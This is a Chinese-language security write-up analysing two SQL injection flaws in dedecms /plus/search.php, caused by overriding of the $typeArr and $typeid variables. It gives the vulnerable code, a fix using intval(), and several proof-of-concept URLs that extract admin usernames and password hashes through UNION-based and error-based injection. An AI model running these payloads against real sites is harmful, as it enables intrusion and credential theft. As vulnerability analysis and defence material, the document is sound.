dedecms /plus/search.php SQL Injection && Local Variable Overriding
2017-11-26 16:06
756 查看
catalog
1. 漏洞描述
这个文件有两处注入漏洞
Relevant
Link:
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
这个文件有两处注入漏洞
1. $typeid变量覆盖导致ChannelTypeid被强制改变: 低风险 2. $typeArr的本地变量覆盖注入+$typeid变量覆盖导致SQL注入: 高风险
Relevant
Link:
http://graysb.diandian.com/post/2013-03-10/40049018798 http://0day5.com/archives/341[/code]
2. 漏洞触发条件
0x1: POC1http://dede/plus/search.php?typeid=1&keyword=test /* 在请求的时候URL中要带上keyword,因为在search.php中有对keyword的检测 if(($keyword=='' || strlen($keyword)<2) && empty($typeid)) { ShowMsg('关键字不能小于2个字节!','-1'); exit(); } */
0x2: POC2http://localhost/dede/plus/search.php?typeArr[1%201%3d2union%20select%20pwd%20from%20dede_admin]=11&kwtype=0&q=11 //$typeArr的键本身是payload,keyword要和这个键的值相同
0x3: Safe Alert: Request Error step 2 !xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
0x4: Safe Alert: Request Error step 1 !xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(* 148ff ),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
Relevant
Link:http://zone.wooyun.org/content/2414
3. 漏洞影响范围
4. 漏洞代码分析
0x1: $typeid变量覆盖导致ChannelTypeid被强制改变
\plus\search.php.. $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; .. $sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid); ..
\include\arc.searchview.class.php... //php5构造函数 function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0) { global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time; if(empty($upagesize)) { $upagesize = 10; } //直接赋值 $this->TypeID = $typeid; .. } ..
0x2:
的本地变量覆盖注入
typeArr的本地变量覆盖注入+typeid变量覆盖导致SQL注入
\plus\search.php//查找栏目信息 if(empty($typeid)) { ... //引入栏目缓存并看关键字是否有相关栏目内容 require_once($typenameCacheFile); //黑客通过本地变量覆盖漏洞改变$typeArr变量的值,进入if判断逻辑 if(isset($typeArr) && is_array($typeArr)) { //1. 遍历这个全局数组$typeArr,从中取出键值对 foreach($typeArr as $id => $typename) { /* 2. 从我们输入的关键字参数$keyword中删除这个全局数组($typeArr)中出现过的值,也就是说,这个$typeArr本来是充当一个敏感关键字的数组的作用 3. 注意,str_replace()返回的是替换后的数组或者字符串 4. 如果检测到了我们规定的关键字($typeArr中保存的值)出现在了我们输出的$keyword参数中,就进行过滤并删除 */ $keywordn = str_replace($typename, ' ', $keyword); if($keyword != $keywordn) { $keyword = $keywordn; //5. 但是在过滤的过程中,却发生了另一个本地变量覆盖,$typeid这个变量会被"直接"带入到后续的SQL查询中 $typeid = $id; break; } } } }
\include\arc.searchview.class.phpfunction __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0) { .. $this->TypeID = $typeid; ... else { //将可能包含黑客注入畸形字符的$this->TypeID直接带入SQL查询 $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}"); $this->ChannelTypeid=$row['channeltype']; } .. } ..
这种注入是利用了数组的键进行了注入
Relevant
Link:http://www.2cto.com/Article/201301/184105.html
5. 防御方法
\plus\search.php//查找栏目信息 if(empty($typeid)) { .. if($keyword != $keywordn) { $keyword = HtmlReplace($keywordn); //对键值$id进行规范化处理 $typeid = intval($id); break; } .. } .. //对$typeid进行规范化处理 $typeid = intval($typeid); ..
6. 攻防思考
Copyright
(c) 2015 LittleHann All rights reserved
相关文章推荐
- dedecms /plus/search.php SQL Injection && Local Variable Overriding
- dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
- dedecms /plus/stow.php Twice SQL Injection
- dedeCMS /plus/ad_js.php、/plus/mytag_js.php Vul Via Injecting PHP Code By /plus/download.php Into DB && /include/dedesql.class.php
- dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php
- dedecms /include/filter.inc.php Local Variable Overriding
- QIBO CMS SQL Injection Via Variable Uninitialization In \member\special.php
- dedecms plus/search.php 注入漏洞利用EXP
- dedeCMS /data/mysql_error_trace.php DB error raised PHP Code Injection Via /include/dedesql.class.php Log FIle Without Access Validation
- DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
- dedecms /include/helpers/archive.helper.php SQL Injection Vul
- dedecms /plus/feedback_ajax.php、/templets/feedback_main.htm、/templets/feedback_edit.htm XSS && SQL Injection Vul
- [通杀]dedecms plus/search.php 注入漏洞利用EXP
- oracle sql*plus set &spool介绍(二)
- 关于Xdebug 在PHP5.3中无法取得local variable值的问题解决
- sqlplus&nbsp;使用精讲
- local variable 'a' referenced before assignment
- Web_PHP_织梦DedeCMS万能标签{dede:sql}的用法举例
- django模版local variable 'has' referenced before assignment